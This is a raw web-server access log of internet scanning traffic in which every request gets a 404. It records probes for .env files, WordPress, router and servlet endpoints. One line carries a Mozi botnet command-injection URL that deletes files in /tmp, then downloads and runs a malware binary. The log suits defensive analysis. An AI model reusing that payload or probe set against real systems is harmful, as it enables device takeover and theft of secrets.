hr_read(): Connection reset by peer [plugins/http/http.c line 918] +[pid: 19148|app: 0|req: 334/393] 83.97.20.34 () {30 vars in 328 bytes} [Wed Feb 2 16:44:51 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 335/394] 128.14.134.170 () {34 vars in 488 bytes} [Wed Feb 2 18:09:19 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 336/395] 209.17.96.234 () {30 vars in 410 bytes} [Wed Feb 2 18:43:08 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 337/396] 83.97.20.34 () {26 vars in 287 bytes} [Wed Feb 2 18:50:35 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 338/397] 139.162.145.250 () {34 vars in 445 bytes} [Wed Feb 2 18:58:19 2022] GET /bag2 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 39/398] 39.103.159.236 () {22 vars in 234 bytes} [Wed Feb 2 20:10:03 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 339/399] 39.103.159.236 () {22 vars in 297 bytes} [Wed Feb 2 20:10:09 2022] GET /nice%20ports%2C/Tri%6Eity.txt%2ebak => generated 179 bytes in 2 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 340/400] 39.103.159.236 () {22 vars in 239 bytes} [Wed Feb 2 20:10:15 2022] OPTIONS / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 341/401] 39.103.159.236 () {22 vars in 239 bytes} [Wed Feb 2 20:10:19 2022] OPTIONS / => generated 179 bytes in 1 msecs (RTSP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 342/402] 39.103.159.236 () {40 vars in 485 bytes} 
[Wed Feb 2 20:10:22 2022] OPTIONS sip:nm => generated 179 bytes in 1 msecs (SIP/2.0 404) 5 headers in 157 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 343/403] 185.142.236.40 () {34 vars in 537 bytes} [Wed Feb 2 20:43:14 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 40/404] 185.142.236.40 () {30 vars in 360 bytes} [Wed Feb 2 20:43:15 2022] GET /robots.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 344/405] 185.142.236.40 () {30 vars in 362 bytes} [Wed Feb 2 20:43:16 2022] GET /sitemap.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 41/406] 185.142.236.40 () {30 vars in 388 bytes} [Wed Feb 2 20:43:17 2022] GET /.well-known/security.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19145|app: 0|req: 3/407] 185.142.236.40 () {36 vars in 515 bytes} [Wed Feb 2 20:43:20 2022] GET /favicon.ico => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 345/408] 130.211.54.158 () {42 vars in 564 bytes} [Wed Feb 2 20:43:25 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[uwsgi-http key: client_addr: 185.219.52.134 client_port: 51190] hr_read(): Connection reset by peer [plugins/http/http.c line 918] +[pid: 19148|app: 0|req: 346/409] 107.189.28.51 () {28 vars in 310 bytes} [Wed Feb 2 22:56:03 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 347/410] 107.189.28.51 () {40 vars in 671 bytes} [Wed Feb 2 22:56:04 2022] POST /HNAP1/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 348/411] 83.97.20.34 () {30 vars 
in 329 bytes} [Wed Feb 2 23:06:23 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 349/412] 193.118.53.210 () {34 vars in 488 bytes} [Thu Feb 3 00:14:11 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 350/413] 106.14.195.175 () {34 vars in 460 bytes} [Thu Feb 3 00:38:39 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 351/414] 64.62.197.122 () {28 vars in 307 bytes} [Thu Feb 3 01:00:02 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 352/415] 83.97.20.34 () {26 vars in 287 bytes} [Thu Feb 3 01:05:35 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 353/416] 62.171.150.168 () {28 vars in 311 bytes} [Thu Feb 3 01:15:14 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 354/417] 20.203.156.151 () {38 vars in 609 bytes} [Thu Feb 3 01:21:07 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 42/418] 20.203.156.151 () {38 vars in 609 bytes} [Thu Feb 3 01:21:07 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 355/419] 20.203.156.151 () {38 vars in 663 bytes} [Thu Feb 3 01:21:08 2022] GET /wp-includes/wlwmanifest.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 43/420] 20.203.156.151 () {38 vars in 636 bytes} [Thu Feb 3 01:21:08 2022] GET /xmlrpc.php?rsd => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) 
+[pid: 19147|app: 0|req: 44/421] 20.203.156.151 () {38 vars in 609 bytes} [Thu Feb 3 01:21:08 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 356/422] 20.203.156.151 () {38 vars in 673 bytes} [Thu Feb 3 01:21:08 2022] GET /blog/wp-includes/wlwmanifest.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 45/423] 20.203.156.151 () {38 vars in 671 bytes} [Thu Feb 3 01:21:08 2022] GET /web/wp-includes/wlwmanifest.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 357/424] 20.203.156.151 () {38 vars in 683 bytes} [Thu Feb 3 01:21:09 2022] GET /wordpress/wp-includes/wlwmanifest.xml => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 358/425] 20.203.156.151 () {38 vars in 679 bytes} [Thu Feb 3 01:21:09 2022] GET /website/wp-includes/wlwmanifest.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 359/426] 20.203.156.151 () {38 vars in 669 bytes} [Thu Feb 3 01:21:09 2022] GET /wp/wp-includes/wlwmanifest.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 360/427] 20.203.156.151 () {38 vars in 673 bytes} [Thu Feb 3 01:21:09 2022] GET /news/wp-includes/wlwmanifest.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 361/428] 20.203.156.151 () {38 vars in 673 bytes} [Thu Feb 3 01:21:09 2022] GET /2020/wp-includes/wlwmanifest.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 362/429] 20.203.156.151 () {38 vars in 673 bytes} [Thu Feb 3 01:21:10 2022] GET /2019/wp-includes/wlwmanifest.xml => generated 179 
bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 363/430] 20.203.156.151 () {38 vars in 673 bytes} [Thu Feb 3 01:21:10 2022] GET /shop/wp-includes/wlwmanifest.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 364/431] 20.203.156.151 () {38 vars in 671 bytes} [Thu Feb 3 01:21:10 2022] GET /wp1/wp-includes/wlwmanifest.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 365/432] 20.203.156.151 () {38 vars in 673 bytes} [Thu Feb 3 01:21:10 2022] GET /test/wp-includes/wlwmanifest.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 366/433] 20.203.156.151 () {38 vars in 671 bytes} [Thu Feb 3 01:21:11 2022] GET /wp2/wp-includes/wlwmanifest.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 367/434] 20.203.156.151 () {38 vars in 673 bytes} [Thu Feb 3 01:21:11 2022] GET /site/wp-includes/wlwmanifest.xml => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 368/435] 20.203.156.151 () {38 vars in 671 bytes} [Thu Feb 3 01:21:11 2022] GET /cms/wp-includes/wlwmanifest.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 369/436] 20.203.156.151 () {38 vars in 673 bytes} [Thu Feb 3 01:21:11 2022] GET /sito/wp-includes/wlwmanifest.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 370/437] 101.133.155.170 () {32 vars in 504 bytes} [Thu Feb 3 01:53:53 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 371/438] 132.226.131.244 () {36 vars in 434 bytes} [Thu 
Feb 3 02:23:43 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 372/439] 62.171.132.199 () {40 vars in 672 bytes} [Thu Feb 3 04:26:38 2022] GET /config/getuser?index=0 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 373/440] 128.14.209.162 () {34 vars in 488 bytes} [Thu Feb 3 04:32:04 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 374/441] 83.97.20.34 () {30 vars in 329 bytes} [Thu Feb 3 04:33:21 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 375/442] 81.196.154.166 () {32 vars in 471 bytes} [Thu Feb 3 04:39:41 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 376/443] 64.227.112.120 () {36 vars in 529 bytes} [Thu Feb 3 06:29:19 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 377/444] 64.227.112.120 () {36 vars in 551 bytes} [Thu Feb 3 06:29:19 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 378/445] 62.171.132.199 () {40 vars in 672 bytes} [Thu Feb 3 06:39:04 2022] GET /config/getuser?index=0 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 46/446] 83.97.20.34 () {26 vars in 287 bytes} [Thu Feb 3 06:48:24 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 379/447] 183.136.225.56 () {34 vars in 456 bytes} [Thu Feb 3 07:16:35 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 
19148|app: 0|req: 380/448] 78.189.127.69 () {34 vars in 642 bytes} [Thu Feb 3 07:23:09 2022] GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 381/449] 128.1.248.42 () {34 vars in 486 bytes} [Thu Feb 3 07:46:45 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 382/450] 136.144.41.117 () {40 vars in 568 bytes} [Thu Feb 3 10:05:46 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 383/451] 194.49.68.118 () {36 vars in 523 bytes} [Thu Feb 3 10:08:18 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 384/452] 194.49.68.118 () {40 vars in 630 bytes} [Thu Feb 3 10:08:18 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 385/453] 40.113.5.119 () {36 vars in 588 bytes} [Thu Feb 3 10:15:15 2022] GET /.env => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 386/454] 40.113.5.119 () {40 vars in 695 bytes} [Thu Feb 3 10:15:16 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 387/455] 83.97.20.34 () {30 vars in 329 bytes} [Thu Feb 3 10:49:11 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 388/456] 20.124.229.98 () {36 vars in 523 bytes} [Thu Feb 3 11:43:28 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 389/457] 20.124.229.98 () {40 vars in 630 bytes} [Thu Feb 3 11:43:28 
2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 390/458] 81.39.100.157 () {34 vars in 392 bytes} [Thu Feb 3 11:58:57 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 391/459] 83.97.20.34 () {26 vars in 287 bytes} [Thu Feb 3 12:41:33 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 392/460] 109.237.103.123 () {36 vars in 525 bytes} [Thu Feb 3 13:54:39 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 393/461] 128.14.134.134 () {34 vars in 488 bytes} [Thu Feb 3 14:29:13 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 394/462] 34.140.248.32 () {42 vars in 561 bytes} [Thu Feb 3 14:43:03 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 395/463] 109.237.103.9 () {36 vars in 523 bytes} [Thu Feb 3 14:55:40 2022] GET /.env => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 396/464] 173.225.110.122 () {34 vars in 519 bytes} [Thu Feb 3 15:21:34 2022] GET /login.cgi.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 397/465] 45.95.169.102 () {40 vars in 567 bytes} [Thu Feb 3 15:40:51 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 398/466] 69.61.242.98 () {36 vars in 522 bytes} [Thu Feb 3 15:55:59 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 399/467] 69.61.242.98 () {40 
vars in 629 bytes} [Thu Feb 3 15:56:00 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 400/468] 83.97.20.34 () {30 vars in 329 bytes} [Thu Feb 3 16:22:49 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 401/469] 2.57.121.59 () {34 vars in 400 bytes} [Thu Feb 3 16:47:38 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 402/470] 103.203.58.4 () {30 vars in 346 bytes} [Thu Feb 3 18:26:13 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 403/471] 83.97.20.34 () {26 vars in 287 bytes} [Thu Feb 3 18:59:02 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 404/472] 2.57.121.59 () {34 vars in 400 bytes} [Thu Feb 3 19:26:23 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 405/473] 132.145.39.16 () {34 vars in 438 bytes} [Thu Feb 3 19:35:04 2022] GET /contact => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 406/474] 132.145.39.16 () {34 vars in 448 bytes} [Thu Feb 3 19:35:04 2022] GET /contact.html => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 407/475] 132.145.39.16 () {34 vars in 446 bytes} [Thu Feb 3 19:35:05 2022] GET /contact.htm => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 408/476] 132.145.39.16 () {34 vars in 446 bytes} [Thu Feb 3 19:35:05 2022] GET /contact.jsp => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 
19148|app: 0|req: 409/477] 132.145.39.16 () {34 vars in 448 bytes} [Thu Feb 3 19:35:06 2022] GET /contact.json => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 410/478] 132.145.39.16 () {34 vars in 446 bytes} [Thu Feb 3 19:35:06 2022] GET /contact.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 411/479] 132.145.39.16 () {34 vars in 458 bytes} [Thu Feb 3 19:35:07 2022] GET /subscription.json => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19140|app: 0|req: 1/480] 132.145.39.16 () {34 vars in 446 bytes} [Thu Feb 3 19:35:07 2022] GET /contact.xml => generated 179 bytes in 238 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 412/481] 209.141.62.219 () {34 vars in 479 bytes} [Thu Feb 3 21:18:49 2022] POST /servlet/~ic/bsh.servlet.BshServlet => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 47/482] 222.186.19.235 () {30 vars in 527 bytes} [Thu Feb 3 21:23:43 2022] GET http://fuwu.sogou.com/404/index.html => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 413/483] 222.186.19.235 () {30 vars in 509 bytes} [Thu Feb 3 21:23:43 2022] GET http://fuwu.sogou.com/404/index.html => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 414/484] 109.237.103.38 () {36 vars in 524 bytes} [Thu Feb 3 21:57:24 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 415/485] 83.97.20.34 () {30 vars in 328 bytes} [Thu Feb 3 22:12:46 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 416/486] 
1.13.189.96 () {34 vars in 367 bytes} [Thu Feb 3 23:02:14 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 417/487] 83.97.20.34 () {26 vars in 287 bytes} [Fri Feb 4 00:34:18 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 418/488] 47.103.5.130 () {34 vars in 425 bytes} [Fri Feb 4 00:37:55 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 419/489] 101.132.111.218 () {34 vars in 461 bytes} [Fri Feb 4 00:44:43 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 420/490] 193.118.53.194 () {34 vars in 488 bytes} [Fri Feb 4 00:45:24 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 421/491] 47.102.98.20 () {40 vars in 601 bytes} [Fri Feb 4 01:31:57 2022] GET /index.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 422/492] 47.102.98.20 () {38 vars in 594 bytes} [Fri Feb 4 01:31:57 2022] GET /phpmyadmin/index.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[uwsgi-http key: client_addr: 31.44.185.119 client_port: 7676] hr_read(): Connection reset by peer [plugins/http/http.c line 918] +[pid: 19148|app: 0|req: 423/493] 116.233.200.101 () {26 vars in 299 bytes} [Fri Feb 4 02:06:04 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 424/494] 116.233.200.101 () {26 vars in 299 bytes} [Fri Feb 4 02:06:04 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 48/495] 116.233.200.101 () {30 vars in 
341 bytes} [Fri Feb 4 02:06:10 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 49/496] 116.233.200.101 () {30 vars in 341 bytes} [Fri Feb 4 02:06:10 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 18/497] 116.233.200.101 () {30 vars in 341 bytes} [Fri Feb 4 02:06:12 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 425/498] 116.233.200.101 () {42 vars in 799 bytes} [Fri Feb 4 02:06:12 2022] POST /cgi-bin/luci/;stok=/locale?form=lang => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19144|app: 0|req: 2/499] 116.233.200.101 () {30 vars in 371 bytes} [Fri Feb 4 02:06:12 2022] GET /navigation.html => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 426/500] 116.233.200.101 () {30 vars in 341 bytes} [Fri Feb 4 02:06:12 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 427/501] 116.233.200.101 () {30 vars in 341 bytes} [Fri Feb 4 02:06:12 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19144|app: 0|req: 3/502] 116.233.200.101 () {30 vars in 424 bytes} [Fri Feb 4 02:06:12 2022] GET /fx_plcinf.html?CMD=Monitor%20Start&LANG=EN => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19144|app: 0|req: 4/503] 116.233.200.101 () {30 vars in 367 bytes} [Fri Feb 4 02:06:12 2022] GET /ifixwebspace/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 428/504] 116.233.200.101 () {30 vars in 365 bytes} [Fri Feb 4 02:06:13 2022] GET /KingViewWeb/ => generated 179 
bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 429/505] 116.233.200.101 () {30 vars in 367 bytes} [Fri Feb 4 02:06:13 2022] GET /webconfig.ini => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 430/506] 65.49.20.69 () {28 vars in 305 bytes} [Fri Feb 4 02:06:51 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 431/507] 167.248.133.62 () {28 vars in 311 bytes} [Fri Feb 4 02:32:21 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 432/508] 167.248.133.62 () {34 vars in 443 bytes} [Fri Feb 4 02:32:21 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 433/509] 62.171.132.199 () {40 vars in 672 bytes} [Fri Feb 4 02:47:53 2022] GET /config/getuser?index=0 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 434/510] 209.17.97.2 () {30 vars in 408 bytes} [Fri Feb 4 03:09:49 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 435/511] 136.144.41.117 () {40 vars in 568 bytes} [Fri Feb 4 03:13:47 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 436/512] 47.101.46.78 () {34 vars in 430 bytes} [Fri Feb 4 03:35:21 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 437/513] 83.97.20.34 () {30 vars in 329 bytes} [Fri Feb 4 04:06:52 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 438/514] 67.245.203.235 () {32 vars in 488 bytes} 
